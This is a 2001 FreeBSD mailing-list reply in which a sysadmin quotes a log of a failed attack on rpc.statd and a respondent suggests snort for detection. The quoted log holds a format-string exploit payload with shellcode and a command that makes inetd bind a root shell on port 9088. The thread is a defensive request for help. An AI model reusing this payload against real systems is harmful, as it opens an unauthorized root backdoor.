From owner-freebsd-questions  Thu Jan  4  7:29:13 2001
From owner-freebsd-questions@FreeBSD.ORG  Thu Jan  4 07:29:11 2001
Return-Path: <owner-freebsd-questions@FreeBSD.ORG>
Delivered-To: freebsd-questions@freebsd.org
Received: from magellan.palisadesys.com (magellan.palisadesys.com [192.188.162.211])
	by hub.freebsd.org (Postfix) with ESMTP id 2449537B400
	for <freebsd-questions@FreeBSD.ORG>; Thu,  4 Jan 2001 07:29:11 -0800 (PST)
Received: from localhost (ghelmer@localhost)
	by magellan.palisadesys.com (8.11.0/8.11.0) with ESMTP id f04FQ0q11256;
	Thu, 4 Jan 2001 09:26:00 -0600
Date: Thu, 4 Jan 2001 09:26:00 -0600 (CST)
From: Guy Helmer <ghelmer@palisadesys.com>
To: Eric_Stanfield@kenokozie.com
Cc: freebsd-questions@FreeBSD.ORG
Subject: Re: hack attempt (again) - help
In-Reply-To: <OF4CA83D7A.DC3A3B98-ON862569CA.00526722@kka.com>
Message-ID: <Pine.LNX.4.21.0101040919451.10523-100000@magellan.palisadesys.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=iso-8859-1
Content-Transfer-Encoding: QUOTED-PRINTABLE
Sender: owner-freebsd-questions@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.ORG

On Thu, 4 Jan 2001 Eric_Stanfield@kenokozie.com wrote:

> Alright this jerkoff has once again attempted to hack one of my freebsd
> machines by trying what I assume is a buffer overflow to rpc:
>=20
> Jan  3 23:19:23 mrtg rpc.statd: Invalid hostname to sm_mon:
> ^D=F7=FF=BF^D=F7=FF=BF^E=F7=FF=BF^E=F7=FF=BF^F=F7=FF=BF^F=F7=FF=BF^G=F7=
=FF=BF^G=F7=FF=BF%08x %08x %08x %08x %08x %08x %08x
> %08x %08x %08x %08x %08x %08x %08x
> %0242x%n%055x%n%012x%n%0192x%nM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^=
PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-=
^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM=
-^PM-^P=EBK^M-
>=20
> v=ACM-^C=EE M-^M^(M-^C=C6 M-   ^=B0M-^C=EE M-^M^.M-^C=C6 M-^C=C3 M-^C=EB#=
M-  ^=B41=C0M-^C=EE
> M-^HF'M-^HF*M-^C=C6 M-^HF=ABM-    F=B8=B0+, M-   =F3M-^MN=ACM-^MV=B8=CDM-=
^@1=DBM-
> =D8@=CDM-^@=E8=B0=FF=FF=FF/bin/sh -c echo "9088 stream tcp nowait root /b=
in/sh -i" >>
> /tmp/m; /usr/sbin/inetd /tmp/m;
>=20
> The interesting bit is what he (she?) is attempting to sneak in at the en=
d
> of the garbage sent to the port.
>=20
> I've given the system a thorough check and this seems to have been a seco=
nd
> failed attempt.  I'm now annoyed, however, and would like to be able to a=
t
> least log what address this stuff is originating from.   Can anyone sugge=
st
> something from the ports that would do the trick?  I've disabled nfs/rpc
> but I'm sure the hacker will come knocking again.

snort with a current copy of the rule set from
http://www.whitehats.com/ids/index.html ought to detect this (and lots of
other script kiddie attempts).

Guy

--=20
Guy Helmer, Ph.D.
Sr. Software Engineer, Palisade Systems         ---   ghelmer@palisadesys.c=
om
http://www.palisadesys.com/~ghelmer



To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-questions" in the body of the message